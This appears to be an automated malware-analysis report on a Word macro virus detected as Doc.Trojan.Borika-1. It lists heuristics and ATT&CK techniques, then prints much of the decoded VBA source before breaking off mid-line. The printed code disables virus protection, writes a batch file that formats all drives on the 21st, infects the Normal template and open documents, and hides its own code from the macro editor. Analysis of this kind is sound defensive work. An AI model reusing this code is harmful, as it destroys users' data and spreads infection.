Verdict: MALICIOUS
Risk Score: 288
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample contains VBA macros with AutoOpen and AutoClose functions, indicative of malicious intent. The AutoOpen macro, when the day of the month is the 21st, creates a batch file named C:\Autoexec.bat. This batch file contains commands to format all local drives (C: through K:), effectively acting as a destructive payload. The ClamAV detection 'Doc.Trojan.Borika-1' further supports the malicious nature of this document.
Heuristics (7)
- Legacy WordBasic macro-virus markers (high, OLE_LEGACY_WORDBASIC_MACRO_VIRUS): OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.
- OLE document has large unaccounted-for region (high, OLE_SLACK_ANOMALY): OLE file is 36,352 bytes but its declared streams total only 16,490 bytes; 19,862 bytes (55%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).
- VBA macros detected (medium, OLE_VBA_MACROS, 4 related findings): Document contains VBA macro code.
  - AutoOpen macro (high, OLE_VBA_AUTOOPEN)
  - Auto_Close macro (high, OLE_VBA_AUTOCLOSE)
  - CreateObject call (high, OLE_VBA_CREATEOBJ)
  - Environ() call, environment variable access (low, OLE_VBA_ENVIRON)
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 6134 bytes |

SHA-256: 0950ac028594108f4cf598deaadb86e18cfcd77d19747089e1a956faa4d73ebe
Detection: ClamAV: Doc.Trojan.Borika-1
Obfuscation or payload: unlikely
Preview script: first 1,000 lines of the extracted script

```vba
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "Borika"
Sub AutoOpen()
'MyName = Borika.Macro_Format
'WrittenBy = Borika from Kz (Ust-Kamenogorsk)
'Version = 1.0
Options.VirusProtection = False
Options.ConfirmConversions = False
Options.SaveNormalPrompt = False
If ShowVisualBasicEditor Then Application.Quit True
Call WeTrustInGod
End Sub
Sub WeTrustInGod()
On Error Resume Next
Bat = "C:\Autoexec.bat"
If Day(Date) = 21 Then
SetAttr Dat, vbNormal
Kill Bat
Open Bat For Output As #2
Print #2, "@echo off"
For I = 99 To 122
Print #2, "format " & Chr(I) & ": /autotest /q > nul"
Next I
Print #2, "format a: /autotest /q > nul"
Print #2, "format b: /autotest /q > nul"
Print #2, "cls"
For I = 0 To 9
Print #2, "echo."
Next I
Print #2, "echo Borika.Macro_Format Virus"
Close #2
End If
End Sub
Sub AutoClose()
On Error Resume Next
windir = Environ("windir")
Options.VirusProtection = False
Options.ConfirmConversions = False
Options.SaveNormalPrompt = False
Call Exp
If NormalTemplate.VBProject.VBComponents.Item("Borika").CodeModule.Lines(2, 1) <> "'MyName = Borika.Macro_Format" Then
NormalTemplate.VBProject.VBComponents.Import (windir & "\~$ad.dll")
NormalTemplate.Save
End If
If ActiveDocument.VBProject.VBComponents.Item("Borika").CodeModule.Lines(2, 1) <> "'MyName = Borika.Macro_Format" Then
ActiveDocument.VBProject.VBComponents.Import (windir & "\~$ad.dll")
ActiveDocument.SaveAs ActiveDocument.FullName
End If
End Sub
Sub ToolsMacro()
On Error Resume Next
windir = Environ("windir")
Call Hide
For X = 1 To NormalTemplate.VBProject.VBComponents("Borika").CodeModule.CountOfLines - 1
CodeNT = CodeNT & NormalTemplate.VBProject.VBComponents("Borika").CodeModule.Lines(X, 1) & Chr(13)
Next X
NormalTemplate.VBProject.VBComponents("Borika").CodeModule.DeleteLines 1, NormalTemplate.VBProject.VBComponents("Borika").CodeModule.CountOfLines
NormalTemplate.Saved = True
If Documents.Count >= 1 Then
For Y = 1 To ActiveDocument.VBProject.VBComponents("Borika").CodeModule.CountOfLines - 1
CodeAD = CodeAD & ActiveDocument.VBProject.VBComponents("Borika").CodeModule.Lines(Y, 1) & Chr(13)
Next Y
For X = 1 To Documents.Count
Documents(X).VBProject.VBComponents("Borika").CodeModule.DeleteLines 1, Documents(X).VBProject.VBComponents("Borika").CodeModule.CountOfLines
Documents(X).Saved = True
Next X
End If
Dialogs(wdDialogToolsMacro).Show
If Not ShowVisualBasicEditor Then
NormalTemplate.VBProject.VBComponents("Borika").CodeModule.InsertLines 1, CodeNT
NormalTemplate.Save
If NormalTemplate.VBProject.VBComponents.Item("Borika").CodeModule.Lines(2, 1) <> "'MyName = Borika.Macro_Format" Then
NormalTemplate.VBProject.VBComponents.Import (windir & "\~$ad.dll")
NormalTemplate.Save
End If
If Documents.Count >= 1 Then
For X = 1 To Documents.Count
Documents(X).VBProject.VBComponents("Borika").CodeModule.InsertLines 1, CodeAD
Documents(X).SaveAs Documents(X).FullName
If Documents(X).VBProject.VBComponents.Item("Borika").CodeModule.Lines(2, 1) <> "'MyName = Borika.Macro_Format" Then
Documents(X).VBProject.VBComponents.Import (windir & "\~$ad.dll")
Documents(X).SaveAs Documents(X).FullName
End If
Next X
End If
End If
End Sub
Sub ViewVBCode()
On Error Resume Next
Call Hide
NormalTemplate.VBProject.VBComponents("Borika").CodeModule.DeleteLines 1, NormalTemplate.VBProject.VBComponents("Borika").CodeModule.CountOfLines
NormalTemplate.Saved = True
NormalTemplate.VBProject.VBComponents.Remove NormalTemplate.VBProject.VBComponents("Borika")
NormalTemplate.Saved = True
If Application.Documents.Count >= 1 Then
For X = 1 To Application.Documents.Count
Documents(X).VBProject.VBComp
```
... (truncated)